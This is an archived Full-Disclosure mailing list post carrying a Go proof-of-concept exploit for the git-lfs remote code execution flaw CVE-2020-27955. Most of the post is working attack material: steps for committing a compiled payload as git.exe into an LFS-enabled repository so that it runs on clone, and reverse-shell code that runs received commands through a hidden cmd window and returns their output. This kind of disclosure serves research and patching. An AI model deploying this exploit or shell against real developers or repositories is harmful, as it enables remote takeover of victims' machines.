lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 4 Nov 2020 23:26:44 -0300
From: Dawid Golunski <dawid@...alhackers.com>
To: fulldisclosure@...lists.org
Subject: [FD] Git LFS (git-lfs) - Remote Code Execution (RCE) exploit
 CVE-2020-27955 - Clone to Pwn

/*
   Go PoC exploit for git-lfs -  Remote Code Execution (RCE)
vulnerability CVE-2020-27955
   git-lfs-RCE-exploit-CVE-2020-27955.go

   Discovered by Dawid Golunski
   https://legalhackers.com
   https://exploitbox.io


   Affected (RCE exploit):
   Git / GitHub CLI / GitHub Desktop / Visual Studio / GitKraken /
SmartGit / SourceTree etc.
   Basically the whole Windows dev world which uses git.

   Usage:
   Compile: go build git-lfs-RCE-exploit-CVE-2020-27955.go
   Save & commit as git.exe

   The payload should get executed automatically on git clone operation.
   It spawns a reverse shell, or a calc.exe for testing (if it
couldn't connect).

   An lfs-enabled repository with lfs files may also be needed so that git-lfs
gets invoked. This can be achieved with:

   git lfs track "*.dat"
   echo "fat bug file" > lfsdata.dat
   git add .*
   git add *
   git commmit -m 'git-lfs exploit' -a

   Check out the full advisory for details:

   https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html

   https://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html

   PoC video at:
   https://youtu.be/tlptOf9w274

 ** For testing purposes only **


*/

package main
import (
    "net"
    "os/exec"
    "bufio"
    "syscall"
)


func revsh(host string) {

    c, err := net.Dial("tcp", host)
    if nil != err {
    // Conn failed
        if nil != c {
            c.Close()
        }
        // Calc for testing purposes if no listener available
        cmd := exec.Command("calc")
        cmd.Run()
        return
    }

    r := bufio.NewReader(c)
    for {
        runcmd, err := r.ReadString('\n')
        if nil != err {
            c.Close()
            return
        }
        cmd := exec.Command("cmd", "/C", runcmd)
        cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
        out, _ := cmd.CombinedOutput()
        c.Write(out)
    }
}

// Connect to netcat listener on local port 1337
func main() {
    revsh("localhost:1337")
}


-- 
Regards,
Dawid Golunski
https://legalhackers.com
https://ExploitBox.io
t: @dawid_golunski

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists